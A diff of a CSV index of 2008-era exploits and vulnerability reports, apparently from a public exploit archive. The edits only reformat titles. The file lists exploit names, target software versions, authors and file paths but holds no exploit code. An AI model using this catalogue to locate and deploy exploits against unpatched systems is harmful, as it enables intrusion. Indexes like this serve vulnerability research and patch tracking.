5214,platforms/php/webapps/5214.txt,"Mitra Informatika Solusindo cart Remote SQL Injection Vulnerability",2008-03-04,bius,php,webapps,0 5215,platforms/multiple/remote/5215.txt,"Ruby 1.8.6 (Webrick Httpd 1.3.1) Directory Traversal Vulnerability",2008-03-06,DSecRG,multiple,remote,0 5216,platforms/php/webapps/5216.txt,"XOOPS Module Glossario 2.2 (sid) Remote SQL Injection Vulnerability",2008-03-06,S@BUN,php,webapps,0 @@ -4913,7 +4913,7 @@ id,file,description,date,author,platform,type,port 5279,platforms/php/webapps/5279.txt,"Mambo Component accombo 1.x - (id) SQL Injection Vulnerability",2008-03-19,S@BUN,php,webapps,0 5280,platforms/php/webapps/5280.txt,"Joomla Component Restaurante 1.0 (id) SQL Injection Vulnerability",2008-03-19,S@BUN,php,webapps,0 5281,platforms/php/webapps/5281.php,"PEEL CMS Admin Hash Extraction and Remote Upload Exploit",2008-03-19,"Charles Fol",php,webapps,0 -5282,platforms/solaris/remote/5282.txt,"Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit",2008-03-20,kingcope,solaris,remote,0 +5282,platforms/solaris/remote/5282.txt,"Sun Solaris <= 10 - rpc.ypupdated Remote Root Exploit",2008-03-20,kingcope,solaris,remote,0 5283,platforms/linux/remote/5283.txt,"CenterIM <= 4.22.3 - Remote Command Execution Vulnerability",2008-03-20,"Brian Fonfara",linux,remote,0 5285,platforms/php/webapps/5285.txt,"RunCMS Module section (artid) Remote SQL Injection Vulnerability",2008-03-20,Cr@zy_King,php,webapps,0 5286,platforms/php/webapps/5286.txt,"ASPapp Knowledge Base Remote SQL Injection Vulnerability",2008-03-20,xcorpitx,php,webapps,0 @@ -5016,7 +5016,7 @@ id,file,description,date,author,platform,type,port 5383,platforms/php/webapps/5383.txt,"Site Sift Listings (id) Remote SQL Injection Vulnerability",2008-04-06,S@BUN,php,webapps,0 5384,platforms/php/webapps/5384.txt,"Prozilla Top 100 1.2 - Arbitrary Delete Stats Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 5385,platforms/php/webapps/5385.txt,"Prozilla Forum Service (forum.php forum) SQL Injection Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 -5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) Remote Overflow Exploit",2008-04-06,"INetCop Security",linux,remote,80 +5386,platforms/linux/remote/5386.txt,"Apache Tomcat Connector jk2-2.0.2 (mod_jk2) - Remote Overflow Exploit",2008-04-06,"INetCop Security",linux,remote,80 5387,platforms/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 - Arbitrary Delete User Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 5388,platforms/php/webapps/5388.txt,"Prozilla Topsites 1.0 - Arbitrary Edit/Add Users Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 5389,platforms/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 (id) Remote SQL Injection Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 @@ -5029,7 +5029,7 @@ id,file,description,date,author,platform,type,port 5396,platforms/windows/dos/5396.txt,"hp openview nnm 7.53 - Multiple Vulnerabilities",2008-04-07,"Luigi Auriemma",windows,dos,0 5397,platforms/windows/remote/5397.txt,"CDNetworks Nefficient Download (NeffyLauncher.dll) Code Execution Vuln",2008-04-07,"Simon Ryeo",windows,remote,0 5398,platforms/windows/remote/5398.html,"Tumbleweed SecureTransport FileTransfer ActiveX BoF Exploit",2008-04-07,"Patrick Webster",windows,remote,0 -5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 (viewsource.php file) File Disclosure Vulnerability",2008-04-07,Stack,php,webapps,0 +5399,platforms/php/webapps/5399.txt,"ChartDirector 4.1 - (viewsource.php file) File Disclosure Vulnerability",2008-04-07,Stack,php,webapps,0 5400,platforms/php/webapps/5400.txt,"724CMS <= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability",2008-04-07,Lidloses_Auge,php,webapps,0 5401,platforms/php/webapps/5401.txt,"My Gaming Ladder <= 7.5 (ladderid) SQL Injection Vulnerability",2008-04-07,t0pP8uZz,php,webapps,0 5402,platforms/php/webapps/5402.txt,"iScripts SocialWare (id) Remote SQL Injection Vulnerbility",2008-04-07,t0pP8uZz,php,webapps,0 @@ -5048,7 +5048,7 @@ id,file,description,date,author,platform,type,port 5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0 5417,platforms/php/webapps/5417.htm,"phpBB Add-on Fishing Cat Portal Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0 5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0 -5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script (path) File Disclosure Vulnerability",2008-04-09,JIKO,php,webapps,0 +5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script - (path) File Disclosure Vulnerability",2008-04-09,JIKO,php,webapps,0 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure Vulnerability",2008-04-09,HaCkeR_EgY,php,webapps,0 5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection Vulnerabilities",2008-04-09,"Virangar Security",php,webapps,0 5422,platforms/php/webapps/5422.pl,"LiveCart <= 1.1.1 (category id) Blind SQL Injection Exploit",2008-04-10,irvian,php,webapps,0 @@ -5222,7 +5222,7 @@ id,file,description,date,author,platform,type,port 5597,platforms/php/webapps/5597.pl,"Battle.net Clan Script <= 1.5.x - Remote SQL Injection Exploit",2008-05-12,Stack,php,webapps,0 5598,platforms/php/webapps/5598.txt,"Mega File Hosting Script 1.2 (fid) Remote SQL Injection Vulnerability",2008-05-12,TurkishWarriorr,php,webapps,0 5599,platforms/php/webapps/5599.txt,"PHP Classifieds Script <= 05122008 SQL Injection Vulnerabilities",2008-05-12,InjEctOr5,php,webapps,0 -5600,platforms/php/webapps/5600.php,"CMS Made Simple <= 1.2.4 (FileManager module) File Upload Exploit",2008-05-12,EgiX,php,webapps,0 +5600,platforms/php/webapps/5600.php,"CMS Made Simple <= 1.2.4 - (FileManager module) File Upload Exploit",2008-05-12,EgiX,php,webapps,0 5601,platforms/php/webapps/5601.pl,"Advanced Image Hosting (AIH) 2.1 - Remote SQL Injection Exploit",2008-05-12,Stack,php,webapps,0 5602,platforms/php/webapps/5602.txt,"AJ HYIP ACME (topic_detail.php id) Remote SQL Injection Vulnerability",2008-05-12,InjEctOr5,php,webapps,0 5603,platforms/php/webapps/5603.txt,"EQDKP 1.3.2f (user_id) Authentication Bypass (PoC)",2008-05-13,vortfu,php,webapps,0 @@ -5244,7 +5244,7 @@ id,file,description,date,author,platform,type,port 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0 5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0 5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript (page_to_include) RFI Vulnerability",2008-05-14,HaCkeR_EgY,php,webapps,0 -5622,platforms/multiple/remote/5622.txt,"Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit",2008-05-15,"Markus Mueller",multiple,remote,22 +5622,platforms/multiple/remote/5622.txt,"Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit (perl)",2008-05-15,"Markus Mueller",multiple,remote,22 5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript SQL Injection Vulnerabilities",2008-05-15,"Virangar Security",php,webapps,0 5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 (rfi/rfd/sql/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0 5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0 @@ -5258,7 +5258,7 @@ id,file,description,date,author,platform,type,port 5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS (default.asp id) Remote SQL Injection Exploit",2008-05-16,JosS,asp,webapps,0 5634,platforms/php/webapps/5634.htm,"Zomplog <= 3.8.2 (newuser.php) Arbitrary Add Admin Exploit",2008-05-16,ArxWolf,php,webapps,0 5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 (post_id) SQL Injection Exploit",2008-05-16,Stack,php,webapps,0 -5636,platforms/php/webapps/5636.txt,"Zomplog <= 3.8.2 (force_download.php) File Disclosure Vulnerability",2008-05-16,Stack,php,webapps,0 +5636,platforms/php/webapps/5636.txt,"Zomplog <= 3.8.2 - (force_download.php) File Disclosure Vulnerability",2008-05-16,Stack,php,webapps,0 5637,platforms/php/webapps/5637.txt,"WR-Meeting 1.0 (msnum) Local File Disclosure Vulnerability",2008-05-17,Cr@zy_King,php,webapps,0 5638,platforms/php/webapps/5638.txt,"How2ASP.net Webboard <= 4.1 - Remote SQL Injection Vulnerability",2008-05-17,"CWH Underground",php,webapps,0 5639,platforms/php/webapps/5639.pl,"FicHive 1.0 (category) Remote Blind SQL Injection Exploit",2008-05-17,His0k4,php,webapps,0 @@ -5308,7 +5308,7 @@ id,file,description,date,author,platform,type,port 5683,platforms/php/webapps/5683.txt,"PHPhotoalbum 0.5 - Multiple Remote SQL Injection Vulnerabilities",2008-05-28,cOndemned,php,webapps,0 5684,platforms/php/webapps/5684.txt,"Joomla Component Artist (idgalery) SQL Injection Vulnerability",2008-05-28,Cr@zy_King,php,webapps,0 5685,platforms/php/webapps/5685.txt,"FlashBlog (articulo_id) Remote SQL Injection Vulnerability",2008-05-28,HER0,php,webapps,0 -5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0 +5687,platforms/windows/dos/5687.txt,"Adobe Acrobat Reader <= 8.1.2 - Malformed PDF Remote DoS PoC",2008-05-29,securfrog,windows,dos,0 5688,platforms/php/webapps/5688.php,"SyntaxCMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit",2008-05-29,Stack,php,webapps,0 5689,platforms/php/webapps/5689.txt,"AirvaeCommerce 3.0 (pid) Remote SQL Injection Vulnerability",2008-05-29,QTRinux,php,webapps,0 5690,platforms/php/webapps/5690.txt,"PicoFlat CMS 0.5.9 - Local File Inclusion Vulnerabilitty (win)",2008-05-29,gmda,php,webapps,0 @@ -5375,7 +5375,7 @@ id,file,description,date,author,platform,type,port 5753,platforms/asp/webapps/5753.txt,"JiRo?s FAQ Manager (read.asp fID) 1.0 - SQL Injection Vulnerability",2008-06-08,Zigma,asp,webapps,0 5754,platforms/php/webapps/5754.txt,"phpinv 0.8.0 - (LFI/XSS) Multiple Vulnerabilities",2008-06-08,"CWH Underground",php,webapps,0 5755,platforms/php/webapps/5755.pl,"Joomla Component yvcomment <= 1.16 - Blind SQL Injection Exploit",2008-06-08,His0k4,php,webapps,0 -5756,platforms/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 (filename) File Disclosure Vulnerability",2008-06-08,MEEKAAH,php,webapps,0 +5756,platforms/php/webapps/5756.txt,"XOOPS Module Uploader 1.1 - (filename) File Disclosure Vulnerability",2008-06-08,MEEKAAH,php,webapps,0 5757,platforms/php/webapps/5757.txt,"BrowserCRM 5.002.00 (clients.php) Remote File Inclusion Vulnerability",2008-06-08,ahmadbady,php,webapps,0 5758,platforms/php/webapps/5758.txt,"Galatolo Web Manager 1.0 - XSS / Local File Inclusion Vulnerability",2008-06-08,StAkeR,php,webapps,0 5759,platforms/php/webapps/5759.txt,"Joomla Component rapidrecipe Remote SQL Injection Vulnerability",2008-06-08,His0k4,php,webapps,0 @@ -5409,7 +5409,7 @@ id,file,description,date,author,platform,type,port 5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Remote Blind SQL Injection Vulnerability",2008-06-11,"CWH Underground",php,webapps,0 5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injection Vulnerabilities",2008-06-11,BugReport.IR,php,webapps,0 5789,platforms/php/webapps/5789.pl,"JAMM CMS (id) Remote Blind SQL Injection Exploit",2008-06-11,N/A,php,webapps,0 -5790,platforms/multiple/remote/5790.txt,"SNMPv3 HMAC validation error Remote Authentication Bypass Exploit",2008-06-12,"Maurizio Agazzini",multiple,remote,161 +5790,platforms/multiple/remote/5790.txt,"SNMPv3 - HMAC validation error Remote Authentication Bypass Exploit",2008-06-12,"Maurizio Agazzini",multiple,remote,161 5791,platforms/php/webapps/5791.txt,"gravity board x 2.0 beta (sql/XSS) Multiple Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 5792,platforms/php/webapps/5792.txt,"Facil-CMS 0.1RC Multiple Local File Inclusion Vulnerabilities",2008-06-12,"CWH Underground",php,webapps,0 5793,platforms/windows/remote/5793.html,"muvee autoProducer <= 6.1 (TextOut.dll) ActiveX Remote BoF Exploit",2008-06-12,Nine:Situations:Group,windows,remote,0 @@ -5618,7 +5618,7 @@ id,file,description,date,author,platform,type,port 6001,platforms/php/webapps/6001.txt,"1024 CMS <= 1.4.4 - Multiple Remote/Local File Inclusion Vulnerabilities",2008-07-04,DSecRG,php,webapps,0 6002,platforms/php/webapps/6002.pl,"Joomla Component altas 1.0 - Multiple Remote SQL Injection Exploit",2008-07-04,Houssamix,php,webapps,0 6003,platforms/php/webapps/6003.txt,"Joomla Component DBQuery <= 1.4.1.1 RFI Vulnerability",2008-07-04,SsEs,php,webapps,0 -6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) Remote BoF Exploit",2008-07-04,"Karol Wiesek",windows,remote,0 +6004,platforms/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote BoF Exploit",2008-07-04,"Karol Wiesek",windows,remote,0 6005,platforms/php/webapps/6005.php,"Site@School <= 2.4.10 (fckeditor) Session Hijacking / File Upload Exploit",2008-07-04,EgiX,php,webapps,0 6006,platforms/php/webapps/6006.php,"Thelia 1.3.5 - Multiple Vulnerabilities Exploit",2008-07-05,BlackH,php,webapps,0 6007,platforms/php/webapps/6007.txt,"Kasseler CMS 1.3.0 - (LFI/XSS) Multiple Vulnerabilities",2008-07-05,Cr@zy_King,php,webapps,0 @@ -5642,7 +5642,7 @@ id,file,description,date,author,platform,type,port 6026,platforms/linux/remote/6026.pl,"trixbox (langChoice) - Local File Inclusion Exploit (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 6027,platforms/php/webapps/6027.txt,"Mole Group Last Minute Script <= 4.0 - Remote SQL Injection Vulnerability",2008-07-08,t0pP8uZz,php,webapps,0 6028,platforms/php/webapps/6028.txt,"BoonEx Ray 3.5 (sIncPath) Remote File Inclusion Vulnerability",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 -6029,platforms/multiple/dos/6029.txt,"Multiple Vendors (Firefox/Evince/EOG/Gimp) - (.SVG) Denial of Service PoC",2008-07-08,"Kristian Hermansen",multiple,dos,0 +6029,platforms/multiple/dos/6029.txt,"Firefox/Evince/EOG/Gimp - (.SVG) Denial of Service PoC",2008-07-08,"Kristian Hermansen",multiple,dos,0 6030,platforms/windows/local/6030.py,"Download Accelerator Plus DAP 8.x - (m3u) Local BoF Exploit (0day)",2008-07-08,h07,windows,local,0 6031,platforms/windows/local/6031.asm,"OllyDBG 1.10 and ImpREC 1.7f - (export name) BoF PoC",2008-07-08,Defsanguje,windows,local,0 6032,platforms/linux/local/6032.py,"Poppler <= 0.8.4 libpoppler uninitialized pointer Code Execution PoC",2008-07-08,"Felipe Andres Manzano",linux,local,0 @@ -5784,7 +5784,7 @@ id,file,description,date,author,platform,type,port 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit",2008-07-30,Jack,php,webapps,0 6172,platforms/php/webapps/6172.pl,"Pligg <= 9.9.0 - Remote Code Execution Exploit",2008-07-30,"GulfTech Security",php,webapps,0 6173,platforms/php/webapps/6173.txt,"pligg <= 9.9.0 (xss/lfi/SQL) Multiple Vulnerabilities",2008-07-30,"GulfTech Security",php,webapps,0 -6174,platforms/multiple/dos/6174.txt,"F-PROT antivirus 6.2.1.4252 (malformed archive) Infinite Loop DoS Exploit",2008-07-31,kokanin,multiple,dos,0 +6174,platforms/multiple/dos/6174.txt,"F-PROT antivirus 6.2.1.4252 - (malformed archive) Infinite Loop DoS Exploit",2008-07-31,kokanin,multiple,dos,0 6175,platforms/windows/remote/6175.html,"NCTsoft AudFile.dll ActiveX Control Remote Buffer Overflow Exploit",2008-07-31,shinnai,windows,remote,0 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 Cookie Poisoning and Login Bypass Vulnerability",2008-07-31,gnix,php,webapps,0 6177,platforms/php/webapps/6177.php,"Symphony <= 1.7.01 (non-patched) Remote Code Execution Exploit",2008-07-31,Raz0r,php,webapps,0 @@ -5841,8 +5841,8 @@ id,file,description,date,author,platform,type,port 6233,platforms/php/webapps/6233.txt,"BBlog 0.7.6 (mod) Remote SQL Injection Vulnerability",2008-08-12,IP-Sh0k,php,webapps,0 6234,platforms/php/webapps/6234.txt,"Joomla 1.5.x - (Token) Remote Admin Change Password Vulnerability",2008-08-12,d3m0n,php,webapps,0 6235,platforms/php/webapps/6235.txt,"gelato CMS 0.95 (img) Remote File Disclosure Vulnerability",2008-08-13,JIKO,php,webapps,0 -6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0 -6237,platforms/multiple/dos/6237.txt,"Ventrilo <= 3.0.2 NULL pointer Remote DoS Exploit",2008-08-13,"Luigi Auriemma",multiple,dos,0 +6236,platforms/multiple/remote/6236.txt,"BIND 9.5.0-P2 - (randomized ports) Remote DNS Cache Poisoning Exploit",2008-08-13,Zbr,multiple,remote,0 +6237,platforms/multiple/dos/6237.txt,"Ventrilo <= 3.0.2 - NULL pointer Remote DoS Exploit",2008-08-13,"Luigi Auriemma",multiple,dos,0 6238,platforms/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 A HREF Remote Buffer Overflow Exploit",2008-08-13,kralor,windows,remote,0 6239,platforms/multiple/dos/6239.txt,"Ruby <= 1.9 (regex engine) Remote Socket Memory Leak Exploit",2008-08-13,"laurent gaffié ",multiple,dos,0 6240,platforms/windows/dos/6240.py,"FlashGet 1.9 - (FTP PWD Response) Remote BoF Exploit PoC (0day)",2008-08-13,h07,windows,dos,0 @@ -5852,7 +5852,7 @@ id,file,description,date,author,platform,type,port 6249,platforms/php/webapps/6249.txt,"ZEEJOBSITE 2.0 (adid) Remote SQL Injection Vulnerability",2008-08-15,"Hussin X",php,webapps,0 6250,platforms/php/webapps/6250.txt,"deeemm CMS (dmcms) 0.7.4 - Multiple Vulnerabilities",2008-08-15,IRCRASH,php,webapps,0 6251,platforms/windows/dos/6251.txt,"ESET Smart Security 3.0.667.0 Privilege Escalation PoC",2008-08-16,g_,windows,dos,0 -6252,platforms/multiple/dos/6252.txt,"VLC 0.8.6i tta File Parsing Heap Overflow PoC",2008-08-16,g_,multiple,dos,0 +6252,platforms/multiple/dos/6252.txt,"VLC 0.8.6i - .tta File Parsing Heap Overflow PoC",2008-08-16,g_,multiple,dos,0 6253,platforms/windows/dos/6253.txt,"EO Video 1.36 - Local Heap Overflow DoS / PoC",2008-08-16,j0rgan,windows,dos,0 6254,platforms/php/webapps/6254.txt,"XNova 0.8 sp1 (xnova_root_path) Remote File Inclusion Vulnerability",2008-08-17,NuclearHaxor,php,webapps,0 6255,platforms/php/webapps/6255.txt,"phpArcadeScript 4 - (cat) Remote SQL Injection Vulnerability",2008-08-17,"Hussin X",php,webapps,0 @@ -5914,7 +5914,7 @@ id,file,description,date,author,platform,type,port 6327,platforms/windows/dos/6327.html,"Najdi.si Toolbar ActiveX Remote Buffer Overflow PoC",2008-08-29,shinnai,windows,dos,0 6328,platforms/solaris/remote/6328.c,"Sun Solaris <= 10 snoop(1M) Utility Remote Exploit",2008-08-29,Andi,solaris,remote,0 6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 (asx file) Local BoF Exploit",2008-08-29,Koshi,windows,local,0 -6330,platforms/windows/dos/6330.txt,"Micrsoft Windows GDI (CreateDIBPatternBrushPt) Heap Overflow PoC",2008-08-29,Ac!dDrop,windows,dos,0 +6330,platforms/windows/dos/6330.txt,"Micrsoft Windows GDI -(CreateDIBPatternBrushPt) Heap Overflow PoC",2008-08-29,Ac!dDrop,windows,dos,0 6332,platforms/php/webapps/6332.txt,"brim 2.0.0 (sql/XSS) Multiple Vulnerabilities",2008-08-30,InjEctOr5,php,webapps,0 6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 (bcproj file) Local BoF Exploit",2008-08-30,Koshi,windows,local,0 6334,platforms/windows/remote/6334.html,"Friendly Technologies Read/Write Registry/Read Files Exploit",2008-08-30,spdr,windows,remote,0 @@ -5947,7 +5947,7 @@ id,file,description,date,author,platform,type,port 6364,platforms/php/webapps/6364.txt,"ACG-ScriptShop (cid) Remote SQL Injection Vulnerability",2008-09-04,"Hussin X",php,webapps,0 6365,platforms/windows/dos/6365.php,"Google Chrome Browser 0.2.149.27 (1583) Remote Silent Crash PoC",2008-09-04,WHK,windows,dos,0 6366,platforms/hardware/remote/6366.c,"MicroTik RouterOS <= 3.13 SNMP write (Set request) PoC",2008-09-05,ShadOS,hardware,remote,0 -6367,platforms/windows/remote/6367.txt,"Google Chrome Browser 0.2.149.27 (SaveAs) Remote BoF Exploit",2008-09-05,SVRT,windows,remote,0 +6367,platforms/windows/remote/6367.txt,"Google Chrome Browser 0.2.149.27 - (SaveAs) Remote BoF Exploit",2008-09-05,SVRT,windows,remote,0 6368,platforms/php/webapps/6368.php,"AWStats Totals (awstatstotals.php sort) Remote Code Execution Exploit",2008-09-05,"Ricardo Almeida",php,webapps,0 6369,platforms/php/webapps/6369.py,"devalcms 1.4a XSS / Remote Code Execution Exploit",2008-09-05,IRCRASH,php,webapps,0 6370,platforms/php/webapps/6370.pl,"WebCMS Portal Edition (index.php id) Blind SQL Injection Exploit",2008-09-05,JosS,php,webapps,0 @@ -6129,7 +6129,7 @@ id,file,description,date,author,platform,type,port 6557,platforms/php/webapps/6557.txt,"ADN Forum <= 1.0b Insecure Cookie Handling Vulnerability",2008-09-24,Pepelux,php,webapps,0 6558,platforms/php/webapps/6558.txt,"barcodegen <= 2.0.0 - Local File Inclusion Vulnerability",2008-09-24,dun,php,webapps,0 6559,platforms/php/webapps/6559.txt,"Observer 0.3.2.1 - Multiple Remote Command Execution Vulnerabilities",2008-09-24,dun,php,webapps,0 -6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad .doc File Local Denial of Service PoC",2008-09-25,securfrog,windows,dos,0 +6560,platforms/windows/dos/6560.txt,"Microsoft Windows Wordpad - .doc File Local Denial of Service PoC",2008-09-25,securfrog,windows,dos,0 6561,platforms/php/webapps/6561.txt,"AJ Auction Pro Platinum - (seller_id) SQL Injection Vulnerability",2008-09-25,InjEctOr5,php,webapps,0 6562,platforms/php/webapps/6562.txt,"LanSuite 3.3.2 (design) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0 6563,platforms/php/webapps/6563.txt,"phpOCS <= 0.1-beta3 (index.php act) Local File Inclusion Vulnerability",2008-09-25,dun,php,webapps,0 @@ -6184,13 +6184,13 @@ id,file,description,date,author,platform,type,port 6613,platforms/php/webapps/6613.txt,"Pilot Group eTraining (news_read.php id) SQL Injection Vulnerability",2008-09-28,S.W.A.T.,php,webapps,0 6614,platforms/windows/dos/6614.html,"Mozilla Firefox 3.0.3 User Interface Null Pointer Dereference Crash",2008-09-28,"Aditya K Sood",windows,dos,0 6615,platforms/windows/dos/6615.html,"Opera 9.52 Window Object Suppressing Remote Denial of Service Exploit",2008-09-28,"Aditya K Sood",windows,dos,0 -6616,platforms/windows/dos/6616.txt,"Microsoft Windows Explorer - Unspecified (.zip) File Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0 +6616,platforms/windows/dos/6616.txt,"Microsoft Windows Explorer - (.zip File) Denial of Service Exploit",2008-09-28,"fl0 fl0w",windows,dos,0 6617,platforms/php/webapps/6617.txt,"BbZL.PhP 0.92 (lien_2) Local Directory Traversal Vulnerability",2008-09-28,JIKO,php,webapps,0 6618,platforms/php/webapps/6618.txt,"joomla component imagebrowser <= 0.1.5 rc2 - Directory Traversal vuln",2008-09-28,Cr@zy_King,php,webapps,0 6619,platforms/windows/dos/6619.html,"Microsoft Internet Explorer GDI+ - Proof of Concept (MS08-052)",2008-09-28,"John Smith",windows,dos,0 6620,platforms/php/webapps/6620.txt,"PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vuln",2008-09-28,boom3rang,php,webapps,0 6621,platforms/php/webapps/6621.txt,"BbZL.PhP 0.92 Insecure Cookie Handling Vulnerability",2008-09-28,Stack,php,webapps,0 -6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0 +6622,platforms/multiple/dos/6622.txt,"Wireshark 1.0.x - Malformed .ncf packet capture Local Denial of Service",2008-09-29,Shinnok,multiple,dos,0 6623,platforms/php/webapps/6623.txt,"events calendar 1.1 - Remote File Inclusion Vulnerability",2008-09-29,"k3vin mitnick",php,webapps,0 6624,platforms/php/webapps/6624.txt,"Arcadem Pro (articlecat) Remote SQL Injection Vulnerability",2008-09-29,"Hussin X",php,webapps,0 6625,platforms/php/webapps/6625.txt,"Post Comments 3.0 Insecure Cookie Handling Vulnerability",2008-09-29,Crackers_Child,php,webapps,0 @@ -6205,7 +6205,7 @@ id,file,description,date,author,platform,type,port 6635,platforms/php/webapps/6635.txt,"SG Real Estate Portal 2.0 Insecure Cookie Handling Vulnerability",2008-09-30,Stack,php,webapps,0 6636,platforms/php/webapps/6636.txt,"Rianxosencabos CMS 0.9 - Remote Blind SQL Injection Vulnerability",2008-09-30,ka0x,php,webapps,0 6637,platforms/php/webapps/6637.txt,"BookMarks Favourites Script (view_group.php id) SQL Injection Vuln",2008-09-30,"Hussin X",php,webapps,0 -6638,platforms/windows/remote/6638.html,"GdPicture Pro ActiveX (gdpicture4s.ocx) File Overwrite / Exec Exploit",2008-09-30,EgiX,windows,remote,0 +6638,platforms/windows/remote/6638.html,"GdPicture Pro ActiveX - (gdpicture4s.ocx) File Overwrite / Exec Exploit",2008-09-30,EgiX,windows,remote,0 6639,platforms/php/webapps/6639.txt,"Pritlog <= 0.4 (filename) Remote File Disclosure Vulnerability",2008-09-30,Pepelux,php,webapps,0 6640,platforms/php/webapps/6640.pl,"ADN Forum <= 1.0b - BlindSQL Injection Exploit",2008-10-01,StAkeR,php,webapps,0 6641,platforms/php/webapps/6641.txt,"MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability",2008-10-01,JosS,php,webapps,0 @@ -6225,7 +6225,7 @@ id,file,description,date,author,platform,type,port 6655,platforms/php/webapps/6655.php,"OpenX 2.6 (ac.php bannerid) Remote Blind SQL Injection Exploit",2008-10-02,d00m3r4ng,php,webapps,0 6656,platforms/windows/remote/6656.txt,"Microsoft Windows GDI - (EMR_COLORMATCHTOTARGETW) Exploit (MS08-021)",2008-10-02,Ac!dDrop,windows,remote,0 6657,platforms/php/webapps/6657.pl,"IP Reg <= 0.4 - Remote Blind SQL Injection Exploit",2008-10-03,StAkeR,php,webapps,0 -6658,platforms/windows/dos/6658.txt,"VBA32 Personal Antivirus 3.12.8.x (malformed archive) DoS Exploit",2008-10-03,LiquidWorm,windows,dos,0 +6658,platforms/windows/dos/6658.txt,"VBA32 Personal Antivirus 3.12.8.x - (malformed archive) DoS Exploit",2008-10-03,LiquidWorm,windows,dos,0 6659,platforms/php/webapps/6659.txt,"Full PHP Emlak Script (arsaprint.php id) SQL Injection Vulnerability",2008-10-03,"Hussin X",php,webapps,0 6660,platforms/windows/dos/6660.txt,"Serv-U <= 7.3 (stou con:1) Denial of Service Vulnerability (auth)",2008-10-03,dmnt,windows,dos,0 6661,platforms/windows/remote/6661.txt,"Serv-U <= 7.3 - Remote FTP File Replacement Vulnerability (auth)",2008-10-03,dmnt,windows,remote,0 @@ -6334,7 +6334,7 @@ id,file,description,date,author,platform,type,port 6767,platforms/php/webapps/6767.txt,"Kure 0.6.3 - (index.php post & doc) Local File Inclusion Vulnerability",2008-10-16,JosS,php,webapps,0 6768,platforms/php/webapps/6768.txt,"Mantis Bug Tracker <= 1.1.3 - Remote Code Execution Exploit",2008-10-16,EgiX,php,webapps,0 6769,platforms/php/webapps/6769.pl,"iGaming CMS 2.0 Alpha 1 (search.php) Remote SQL Injection Exploit",2008-10-16,StAkeR,php,webapps,0 -6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 (file) File Disclosure Vulnerability",2008-10-16,LMaster,php,webapps,0 +6770,platforms/php/webapps/6770.txt,"PHP Easy Downloader 1.5 - (file) File Disclosure Vulnerability",2008-10-16,LMaster,php,webapps,0 6771,platforms/cgi/webapps/6771.txt,"Calendars for the Web 4.02 Admin Auth Bypass Vulnerability",2008-10-16,SecVuln,cgi,webapps,0 6772,platforms/php/webapps/6772.txt,"Post Affiliate Pro 2.0 (index.php md) Local File Inclusion Vulnerability",2008-10-16,ZeN,php,webapps,0 6773,platforms/windows/remote/6773.html,"Hummingbird Deployment Wizard 2008 - ActiveX Command Execution",2008-10-17,shinnai,windows,remote,0 